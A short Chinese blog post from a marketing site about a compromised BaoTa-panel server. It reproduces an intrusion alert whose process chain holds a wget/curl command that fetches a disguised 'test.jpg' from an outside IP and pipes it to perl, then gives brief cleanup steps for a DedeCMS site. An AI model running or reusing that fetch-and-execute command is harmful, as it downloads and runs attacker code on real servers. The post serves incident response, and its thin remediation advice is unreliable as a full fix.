专注电子商务
网络营销、微信电话15545972811

服务器宝塔环境被入侵怎么解决

命令行curl -sS http://185.161.208.2004/test.jpg

进程PID29897

进程文件名curl

父进程ID29893

父进程bash

父进程文件路径/usr/bin/bash

进程链-[7122]  [xfs-reclaim/vda]
-[29891]  [xfs-reclaim/vda]
-[29892]  sh -c export PATH=$PATH:/var/bin;(wget -q -O- http://185.161.208.2004/test.jpg|perl;curl -sS http://185.161.208.234/test.jpg|perl)2>/dev/null
-[29893]  sh -c export PATH=$PATH:/var/bin;(wget -q -O- http://185.161.208.2004/test.jpg|perl;curl -sS http://185.161.208.234/test.jpg|perl)2>/dev/null

第一步找到这个/test.jpg  文件  删除   这个文件一般就是木马文件用TXT文本打开就是木马代码  所以删除 ,另外这个服务器用的事DEDE系统 这个系统就是很多漏洞所以需要吧数据和更新的目录进行权限更改,修补相关漏洞,织梦的修补漏洞和权限修改本站相关内容查找.

重启服务器即可

欢迎转载,转载请注明出处:服务器宝塔环境被入侵怎么解决: http://www.quananxin.com/?p=3222
赞(0) 打赏
未经允许不得转载:东北狼仙-专注哈尔滨SEO_网络营销SEM_品牌策划_电子商务 » 服务器宝塔环境被入侵怎么解决
分享到: 更多 (0)
111资源在第三方平台采集下载,本站不存储该软件为用户提供下载;本站内发布的资源均来源于互联网收集与网友投稿,不保证真实性;另站内所有资源均不代表本站立场,若有侵权或出现违规内容请联系管理员删除; 本站所有资源皆都来源于互联网公开分享的内容,仅限用于个人学习使用; 本站站内所有资源请禁止用于商业用途和倒卖,如真正需要,请支持版权方;

评论 抢沙发

评论前必须登录!

 

网络营销 品牌策划 网站制作

哈尔滨SEO网络营销

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏